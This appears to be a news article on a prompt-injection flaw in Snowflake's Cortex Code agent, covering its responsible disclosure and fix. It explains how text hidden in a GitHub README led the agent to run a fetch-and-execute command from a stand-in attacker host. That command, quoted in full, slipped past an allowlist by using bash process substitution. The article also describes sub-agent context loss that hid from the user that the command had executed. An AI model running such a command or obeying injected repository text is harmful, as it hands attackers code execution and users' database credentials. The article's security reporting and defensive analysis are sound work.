Snowflake Cortex AI Escapes Sandbox and Executes Malware
Three days after Snowflake released its Cortex Code agent — a command-line coding tool similar to Claude Code or OpenAI's Codex, with built-in SQL integration — a security researcher found a vulnerability that let attackers execute arbitrary code on users' machines and hijack their Snowflake conn...
Three days after Snowflake released its Cortex Code agent — a command-line coding tool similar to Claude Code or OpenAI's Codex, with built-in SQL integration — a security researcher found a vulnerability that let attackers execute arbitrary code on users' machines and hijack their Snowflake connections.
The finding, from the security firm PromptArmor and published Monday, reveals an attack chain that bypassed Cortex's command allowlist using a technique called process substitution: a bash syntax feature that lets commands run sub-commands inside their arguments. Cortex listed cat as safe to run without human approval. It did not account for what cat could do when given a process substitution expression — specifically, cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)). The attacker disguised this as code in a GitHub repository README. When a user asked Cortex to review the repository, the injection fired, the command executed without approval, and the attacker's script ran on the victim's machine.
The consequences extended beyond the sandbox. Because Cortex caches authentication tokens, the attacker's script could use the victim's active credentials to access Snowflake: read and exfiltrate database contents, drop tables, add malicious backdoor users, or lock legitimate users out using network rules. "By leveraging cached tokens Cortex uses to authenticate to Snowflake, attackers can: steal database contents, drop tables, add malicious backdoor users to the Snowflake instance, lock legitimate users out with network rules," PromptArmor wrote.
Snowflake's default recommendation — browser-based authentication scoped to the user's access level — does not prevent this. The Cortex program itself retains full access, and so does whatever runs inside it.
There is a detail in the report that suggests how deep this problem runs: during one test run, Cortex invoked multiple sub-agents to explore the repository. The first sub-agent invoked another sub-agent, which ran the malicious commands. When the chain reported back to the main agent, context was lost along the way. The main agent told the user a malicious command had been found and advised them not to run it. It did not inform the user that the command had already been executed by the second-level sub-agent.
PromptArmor calls this sub-agent context loss, and it is not unique to Cortex. It is a structural property of how multi-agent systems pass state between components — a known failure mode that the industry has not resolved.
The vulnerability was disclosed responsibly to Snowflake on February 5, three days after Cortex Code's release. Snowflake validated the finding on February 12 and deployed a fix in version 1.0.25 on February 28. Public disclosure came Monday, March 16. Snowflake says the fix is applied automatically when customers next launch Cortex.
Simon Willison, the AI security researcher who first flagged the finding, was blunt about the architectural lesson: allow-lists against command patterns are inherently unreliable. "I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all," he wrote. "I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself."
One additional note from the PromptArmor report: during testing, the attack worked approximately 50% of the time. This is not a reliability problem with the attack — it is a property of language models. LLMs are non-deterministic. Security mechanisms built on top of them inherit that non-determinism.
Sources:
